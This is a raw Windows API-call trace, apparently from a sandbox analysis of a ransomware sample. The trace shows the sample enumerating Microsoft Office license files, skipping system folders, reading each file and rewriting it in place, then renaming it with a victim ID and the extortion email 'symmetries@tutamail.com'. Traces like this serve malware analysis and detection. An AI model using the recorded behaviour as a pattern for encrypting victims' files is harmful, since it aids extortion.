[0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.010] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11600) returned 1 [0108.010] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.010] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.012] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.012] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.012] CloseHandle (hObject=0x45c) returned 1 [0108.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0108.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0108.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0108.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.014] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe95655e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe95655e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe96bcab7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail2-ul-phn.xrm-ms", cAlternateFileName="PR69DF~1.XRM")) returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.014] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.015] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19945) returned 1 [0108.015] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.015] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.027] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.027] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.027] CloseHandle (hObject=0x45c) returned 1 [0108.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0108.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0108.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0108.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0108.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0108.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0108.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.029] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe94f2f59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe94f2f59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe95b1b38, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Trial-pl.xrm-ms", cAlternateFileName="PR42E3~1.XRM")) returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.029] lstrcmpiW (lpString1="ProjectProR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0108.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0108.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0108.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0108.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0108.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0108.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.030] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11159) returned 1 [0108.030] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0108.031] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0108.076] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.076] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0108.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.076] CloseHandle (hObject=0x45c) returned 1 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0108.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0108.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0108.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0108.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0108.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0108.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0108.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.078] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe94ccc39, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe94ccc39, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe95b1b38, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51ed, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Trial-ppd.xrm-ms", cAlternateFileName="PRC9C8~1.XRM")) returned 1 [0108.078] lstrcmpiW 